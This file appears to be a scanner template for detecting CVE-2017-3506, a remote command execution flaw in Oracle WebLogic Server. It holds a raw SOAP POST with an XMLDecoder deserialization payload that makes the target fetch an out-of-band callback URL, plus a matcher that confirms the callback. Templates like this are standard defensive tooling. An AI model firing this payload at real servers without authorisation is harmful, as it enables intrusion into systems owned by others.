id: CVE-2017-3506

info:
  name: Oracle Weblogic Remote OS Command Execution
  author: pdteam
  description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
  severity: high
  tags: cve,cve2017,weblogic,oracle,rce,oob
  reference: |
      - https://hackerone.com/reports/810778
      - https://nvd.nist.gov/vuln/detail/CVE-2017-3506

requests:
  - raw:
      - |
        POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
        Content-Type: text/xml;charset=UTF-8
        Content-Length: 873

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
              <java version="1.8" class="java.beans.XMLDecoder">
                <void id="url" class="java.net.URL">
                  <string>http://{{interactsh-url}}</string>
                </void>
                <void idref="url">
                  <void id="stream" method ="openStream"/>
                </void>
              </java>
            </work:WorkContext>
            </soapenv:Header>
          <soapenv:Body/>
        </soapenv:Envelope>

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"